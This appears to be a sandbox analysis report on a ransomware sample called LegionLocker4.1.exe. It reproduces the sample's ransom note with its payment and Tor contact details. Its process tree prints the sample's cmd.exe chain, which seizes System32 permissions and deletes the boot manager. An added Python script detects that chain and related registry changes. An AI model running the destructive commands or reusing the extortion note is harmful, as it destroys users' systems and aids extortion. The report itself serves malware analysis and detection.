Resubmissions

26-07-2021 04:39

210726-yf4zy28y4a 10

26-07-2021 03:48

210726-xhrfp51ttx 10

Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-07-2021 03:48

General

  • Target

    LegionLocker4.1.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note

Ooops! All your important files are encrypted!

What happend to my computer?
All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50.

How do i pay?
Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet.

Contact:
1.Download Tor browser (https://www.torproject.org/)
2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/)
3.Write email to us ([email protected])
In case of no anwser in 72 hours write us to this email: [email protected]

What if i already paid?
Send your Bitcoin wallet ID to e-mail provided above.

Attention!
1.Do not modify encrypted files.
2.Do not try decrypt your data using third party software, it may cause pernament data loss.

Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Possible privilege escalation attempt 8 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:580
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2696
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3888
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:188
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1088
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1416
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2236
      • C:\Windows\system32\icacls.exe
        icacls C:\bootmgr /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3796
      • C:\Windows\system32\attrib.exe
        attrib -s -r -h C:\bootmgr
        3⤵
        • Views/modifies file attributes
        PID:4060
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1224
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        3⤵
        PID:2728
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2208
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4064
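Detection logic for the behaviours in the Signatures list and for the cmd.exe chain in the process tree above, written here as an added example; it is not part of this sandbox report and not code from the sample. It splits the `&&` chain, flags takeown/icacls against System32 and bootmgr, flags the attrib/del of bootmgr, and records that `del` is a cmd.exe built-in that spawns no child process (the tree above shows attrib.exe but no process for `del C:\bootmgr`, so process-creation telemetry alone misses that step). It also classifies Sysmon Event ID 13 style registry SetValue records for the two registry signatures. The registry key paths, the Windows defaults for the Winlogon Shell and Userinit values, and the sample events are assumptions: the report says the sample disables Task Manager and modifies Winlogon, but not which values it wrote.

```python
"""
Added example (not part of the sandbox output above): detection logic for
two behaviours this report attributes to LegionLocker4.1.exe, run over
constructed events modelled on the process tree.

1. The cmd.exe chain that takes ownership of System32, its drivers folder,
   LogonUI.exe and bootmgr, then strips bootmgr's attributes and deletes it.
2. Registry writes that disable Task Manager and alter Winlogon autostart
   values. The report names these behaviours but not the values written, so
   the key paths and expected defaults below are assumptions based on the
   usual locations of those settings, not something read from the sample.
"""
import re

# Paths whose ownership/ACLs an ordinary user-mode process should never rewrite.
PROTECTED_PREFIXES = (r"c:\windows\system32", r"c:\bootmgr")

# cmd.exe built-ins execute inside cmd.exe and never appear as child processes:
# the tree above has attrib.exe for "attrib" but nothing for "del C:\bootmgr".
# They are only visible in the parent cmd.exe command line.
CMD_BUILTINS = {"del", "erase", "rd", "rmdir", "exit"}

CMD_RE = re.compile(r'^\s*"?[^"]*cmd\.exe"?\s+/[kc]\s+(.*)$', re.I)
PATH_RE = re.compile(r"^[a-z]:\\", re.I)


def split_cmd_chain(cmdline):
    """Return the individual commands of a `cmd /k a && b && c` line."""
    m = CMD_RE.match(cmdline)
    body = m.group(1) if m else cmdline
    return [c.strip() for c in body.split("&&") if c.strip()]


def classify_command(cmd):
    """Extract the verb and any drive-letter paths from one chained command."""
    tokens = cmd.split()
    verb = tokens[0].lower()
    paths = [t for t in tokens[1:] if PATH_RE.match(t)]
    return {
        "verb": verb,
        "paths": paths,
        "protected": any(p.lower().startswith(PROTECTED_PREFIXES) for p in paths),
        "builtin": verb in CMD_BUILTINS,
    }


def analyse_cmd_chain(cmdline):
    """Findings for one cmd.exe command line, as 'category:detail' strings."""
    findings = []
    for c in (classify_command(x) for x in split_cmd_chain(cmdline)):
        if c["verb"] in ("takeown", "icacls") and c["protected"]:
            findings.append(f"acl_tamper:{c['verb']}:{c['paths'][0]}")
        if c["verb"] in ("attrib", "del", "erase") and any(
                p.lower() == r"c:\bootmgr" for p in c["paths"]):
            findings.append(f"bootmgr_tamper:{c['verb']}")
        if c["builtin"] and c["paths"]:
            findings.append(f"builtin_no_child_process:{c['verb']}")
    return findings


# Assumed registry locations (the report does not state which values changed).
TASKMGR_VALUE = r"\policies\system\disabletaskmgr"
WINLOGON_KEY = r"\windows nt\currentversion\winlogon"
WINLOGON_DEFAULTS = {"shell": "explorer.exe",
                     "userinit": r"c:\windows\system32\userinit.exe,"}


def check_registry_set(target_object, details):
    """Classify one SetValue record (Sysmon Event ID 13 style fields)."""
    target = target_object.lower()
    key, _, name = target.rpartition("\\")
    if target.endswith(TASKMGR_VALUE):
        m = re.search(r"0x([0-9a-f]+)", details, re.I)  # "DWORD (0x00000001)"
        return "taskmgr_disabled" if m and int(m.group(1), 16) != 0 else None
    if key.endswith(WINLOGON_KEY) and name in WINLOGON_DEFAULTS:
        if details.strip().lower() != WINLOGON_DEFAULTS[name]:
            return f"winlogon_{name}_modified"
    return None


def analyse_events(events):
    """Run both checks over a list of constructed telemetry records."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower().endswith("cmd.exe"):
            findings += analyse_cmd_chain(ev["cmdline"])
        elif ev["type"] == "registry":
            hit = check_registry_set(ev["target"], ev["details"])
            if hit:
                findings.append(hit)
    return findings


# Constructed sample: the two cmd.exe lines from the tree above plus two
# hypothetical registry writes shaped like the report's signature names.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": (r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32'
                 r' && icacls C:\Windows\System32 /grant %username%:F'
                 r' && takeown /f C:\Windows\System32\drivers'
                 r' && icacls C:\Windows\System32\drivers /grant %username%:F'
                 r' && takeown /f C:\Windows\System32\LogonUI.exe'
                 r' && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F'
                 r' && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F'
                 r' && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit')},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit'},
    {"type": "registry",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
     "details": "DWORD (0x00000001)"},
    {"type": "registry",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "details": r"explorer.exe, C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"},
]

if __name__ == "__main__":
    for finding in analyse_events(SAMPLE_EVENTS):
        print(finding)
```

Two points of design: the chain is matched on the parent cmd.exe command line, where `%username%` is still unexpanded, rather than on the children, where cmd.exe has already substituted `Admin` (compare the `/grant %username%:F` at level 2 with `/grant Admin:F` at level 3 above); and the `builtin_no_child_process` finding is what tells an analyst that `del C:\bootmgr` ran even though no process for it exists in the tree.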

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

    MD5

    7db09a04d53ec49b19596d7836ac2286

    SHA1

    f92b734a6fd58d4a729d14f32bd69d588d03fb70

    SHA256

    eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7

    SHA512

    fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897

  • memory/188-121-0x0000000000000000-mapping.dmp

  • memory/580-114-0x0000000000120000-0x0000000000121000-memory.dmp

    Filesize

    4KB

  • memory/580-116-0x000000001B5E0000-0x000000001B5E2000-memory.dmp

    Filesize

    8KB

  • memory/580-132-0x000000001B5E4000-0x000000001B5E6000-memory.dmp

    Filesize

    8KB

  • memory/580-131-0x000000001B5E2000-0x000000001B5E4000-memory.dmp

    Filesize

    8KB

  • memory/1088-122-0x0000000000000000-mapping.dmp

  • memory/1224-127-0x0000000000000000-mapping.dmp

  • memory/1416-123-0x0000000000000000-mapping.dmp

  • memory/1920-117-0x0000000000000000-mapping.dmp

  • memory/2208-129-0x0000000000000000-mapping.dmp

  • memory/2236-124-0x0000000000000000-mapping.dmp

  • memory/2368-118-0x0000000000000000-mapping.dmp

  • memory/2696-119-0x0000000000000000-mapping.dmp

  • memory/2728-128-0x0000000000000000-mapping.dmp

  • memory/3796-125-0x0000000000000000-mapping.dmp

  • memory/3888-120-0x0000000000000000-mapping.dmp

  • memory/4060-126-0x0000000000000000-mapping.dmp